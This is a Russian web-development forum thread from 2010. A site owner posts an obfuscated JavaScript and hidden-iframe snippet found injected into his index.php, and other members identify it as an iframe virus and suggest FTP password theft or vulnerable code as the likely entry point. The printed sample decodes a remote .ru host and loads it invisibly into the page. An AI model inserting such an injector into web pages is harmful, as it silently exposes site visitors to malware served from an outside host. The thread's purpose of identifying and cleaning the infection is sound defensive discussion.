Форум Пользователи Пыхослёт
новые сообщения ответы на мои сообщения избранное скрытые темы случайный топик открыть всё в новых вкладках

ФорумПрограммированиеPHP для идиотов → Вирусы на сайте.

Вирусы на сайте.

  • Professor

    Сообщения: 2089 Репутация: N Группа: Адекваты

    Spritz 20 января 2010 г. 19:45

    Недавно обнаружил на своем первом сайте вот такую штуку:

    <script id="Azp01wx1fdv" defer="defer" src="http://discuss-com-hk.elance.com.sponsorads-de.homeproair.ru:8080/lenta.ru/lenta.ru/windowslive.com/sapo.pt/google.com/" type="text/javascript">
    1
    2J5jkkw1 = 'd$!@i&)s$^)@c((#u@s^&!)s!@-($#()c^@&o&&m^&-&&)h&k@$!$.#&!e)$l!#a@^$n@!@#c(!#!e&)@^.#c$&^!^o&^m)))).^)$s)p$&@o)n@!s(&o$@!r)#$a#(d&s!&-&!!@!d@))$e@@(.#@(#h!o(@)m!e$^$p^()r^o#!a&i!)r&#@.^)!&r!^u@())'.replace(/\$|@|\!|\(|#|\^|&|\)/ig, '');
    3f = document.createElement('iframe');
    4f.src = 'http://'+J5jkkw1+':8080/index.php?ys';
    5f.style.visibility = 'h!))&i&)d!^d&e$(#n!$#(&'.replace(/&|\!|\^|@|\$|\(|\)|#/ig, '');
    6document.body.appendChild(f);
    </script>
    <iframe src="http://discuss-com-hk.elance.com.sponsorads-de.homeproair.ru:8080/index.php?ys" style="visibility: hidden;">


    Мне очень интересно что это и как туда попало.

    Просветите пожалуйста =) можно ссылочками

  • phpdude

    Сообщения: 26646 Репутация: N Группа: в ухо

    Spritz 20 января 2010 г. 19:51, спустя 5 минут 57 секунд

    обычный ифрейм вирус ..
    Сапожник без сапог

  • Professor

    Сообщения: 2089 Репутация: N Группа: Адекваты

    Spritz 20 января 2010 г. 19:56, спустя 5 минут 17 секунд

    а нафига вот так шифровать?

    d$!@i&)s$^)@c((#u@s^&!)s!@-($#()c^@&o&&m^&-&&)h&k@$!$.#&!e)$l!#a@^$n@!@#c(!#!e&)@^.#c$&^!^o&^m)))).^)$s)p$&@o)n@!s(&o$@!r)#$a#(d&s!&-&!!@!d@))$e@@(.#@(#h!o(@)m!e$^$p^()r^o#!a&i!)r&#@.^)!&r!^u@())

    Если получается 
    discuss-com-hk.elance.com.sponsorads-de.homeproair.ru

    что в принципе мы и так можем видеть.

    и вот это нафига шифровать 
    h!))&i&)d!^d&e$(#n!$#(& == hidden

  • phpdude

    Сообщения: 26646 Репутация: N Группа: в ухо

    Spritz 20 января 2010 г. 20:05, спустя 8 минут 54 секунды

    да это продукт "хакерский" какой нить. а владелец дора этого дитя 14 летнее какое нить
    Сапожник без сапог

  • Professor

    Сообщения: 2089 Репутация: N Группа: Адекваты

    Spritz 20 января 2010 г. 20:13, спустя 7 минут 31 секунду

    А как могли мне эты фигню засунуть? Только через ФТП? или есть еще какие то способы?

  • phpdude

    Сообщения: 26646 Репутация: N Группа: в ухо

    Spritz 20 января 2010 г. 20:36, спустя 23 минуты 52 секунды


    А как могли мне эты фигню засунуть? Только через ФТП? или есть еще какие то способы?
    самый тупой метод - фтп. получше метод - через говнокод сайта :)
    Сапожник без сапог

  • Professor

    Сообщения: 2089 Репутация: N Группа: Адекваты

    Spritz 20 января 2010 г. 20:50, спустя 13 минут 39 секунд

    Я вот и пытаюсь выпытать как через мой говнокод можно было это сделать.
    Код был записан в index.php. Права на файл 644.

  • Faster

    Сообщения: 1159 Репутация: N Группа: Кто попало

    Spritz 20 января 2010 г. 20:52, спустя 1 минуту 59 секунд

    вротпресс?

  • adw0rd

    Сообщения: 22959 Репутация: N Группа: в ухо

    Spritz 20 января 2010 г. 20:59, спустя 6 минут 28 секунд


    вротпресс?
    ичо?
    https://smappi.org/ - платформа по созданию API на все случаи жизни

  • Professor

    Сообщения: 2089 Репутация: N Группа: Адекваты

    Spritz 20 января 2010 г. 20:59, спустя 46 секунд

    нет =) это мой первый сайт. Говнокод в основном.

  • adw0rd

    Сообщения: 22959 Репутация: N Группа: в ухо

    Spritz 20 января 2010 г. 21:00, спустя 22 секунды

    Professor http://pyha.ru/forum/topic/2990.msg59190#msg59190
    https://smappi.org/ - платформа по созданию API на все случаи жизни

  • AlexB

    Сообщения: 4306 Репутация: N Группа: в ухо

    Spritz 20 января 2010 г. 21:09, спустя 9 минут


    Код был записан в index.php.
    Так обычно и бывает, его же робот пихает … он сканит диры на предмет имени index

  • Professor

    Сообщения: 2089 Репутация: N Группа: Адекваты

    Spritz 20 января 2010 г. 21:10, спустя 1 минуту 4 секунды

    Да, да читал, спасибо, Я решил сайтик этот переписать, так что все равно все с нуля писать буду. Мне просто интересно как от этого защититься. Не постоянно же лечить.
    Хочу закрыть по возможности все дыры (если конечно возможно). А для этого необходимо узнать каким образом они редактируют мои файлы?

  • AlexB

    Сообщения: 4306 Репутация: N Группа: в ухо

    Spritz 20 января 2010 г. 21:16, спустя 5 минут 58 секунд


    А для этого необходимо узнать каким образом они редактируют мои файлы?
    Скорее всего ftp. Если нет, то так сложно сказать, я бы внимательно посмотрел все места где есть upload … исследовать диры куда что-то аплоадится на предмет наличия в них файлов с расширением php.

  • Professor

    Сообщения: 2089 Репутация: N Группа: Адекваты

    Spritz 20 января 2010 г. 21:28, спустя 12 минут 45 секунд

    Сайт визитка. В принципе нет форм загрузки.
    Да даже если бы и были, как получить мой оригинальный index?

    Понятно, меняем пароли =)

Пожалуйста, авторизуйтесь, чтобы написать комментарий!

наше все Форум Пользователи Пыхослёт Slack Тикеты
социализация
(ц) пыха.ру / с 2007 года         Total: 0.009s         Часовой пояс — Europe/Moscow
ПИПИСЬКА